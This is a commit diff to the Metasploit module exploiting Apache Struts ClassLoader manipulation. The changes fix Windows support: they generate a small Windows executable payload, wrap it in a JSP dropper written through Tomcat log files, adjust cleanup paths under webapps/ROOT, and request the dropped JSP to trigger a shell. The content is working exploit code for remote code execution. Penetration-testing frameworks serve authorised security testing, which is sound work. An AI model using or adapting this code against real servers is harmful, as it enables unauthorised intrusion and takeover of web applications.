Land rapid7#3777 - Fix struts_code_exec_classloader on windows

wchen-r7 · wchen-r7 · commit 3e09283ce5fb · 2014-09-16T13:09:58.000-05:00
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -150,6 +150,8 @@ def fix(jsp)
         output << l
       elsif l =~ /<%/
         next
+      elsif l=~ /%>/
+        next
       elsif l.chomp.empty?
         next
       else
@@ -163,10 +165,18 @@ def create_jsp
     if target['Arch'] == ARCH_JAVA
       jsp = fix(payload.encoded)
     else
-      payload_exe = generate_payload_exe
+      if target['Platform'] == 'win'
+        payload_exe = Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "exe-small", {:arch => target.arch, :platform => target.platform})
+      else
+        payload_exe = generate_payload_exe
+      end
       payload_file = rand_text_alphanumeric(4 + rand(4))
       jsp = jsp_dropper(payload_file, payload_exe)
-      register_files_for_cleanup(payload_file)
+      if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+        register_files_for_cleanup("../webapps/ROOT/#{payload_file}")
+      else
+        register_files_for_cleanup(payload_file)
+      end
     end
 
     jsp
@@ -193,12 +203,16 @@ def exploit
 
     # Check if the log file exists and has been flushed
 
-    if check_log_file(normalize_uri(target_uri.to_s))
-      register_files_for_cleanup(@jsp_file)
-    else
+    unless check_log_file(normalize_uri(target_uri.to_s))
       fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
     end
 
+    if target['Platform'] == 'win' && target['Arch'] == ARCH_X86
+      register_files_for_cleanup("../webapps/ROOT/#{@jsp_file}")
+    else
+      register_files_for_cleanup(@jsp_file)
+    end
+
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
     jsp = create_jsp
@@ -213,7 +227,9 @@ def exploit
     end
 
     # Check log file... enjoy shell!
-    check_log_file(random_request)
+    unless target['Arch'] == ARCH_JAVA
+      check_log_file(random_request)
+    end
 
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
@@ -223,6 +239,11 @@ def exploit
         :file_date_format => ''
     }
     modify_class_loader(properties)
+
+    if target['Arch'] == ARCH_JAVA
+      send_request_cgi({ 'uri'     => normalize_uri("/", @jsp_file) })
+    end
+
   end
 
 end
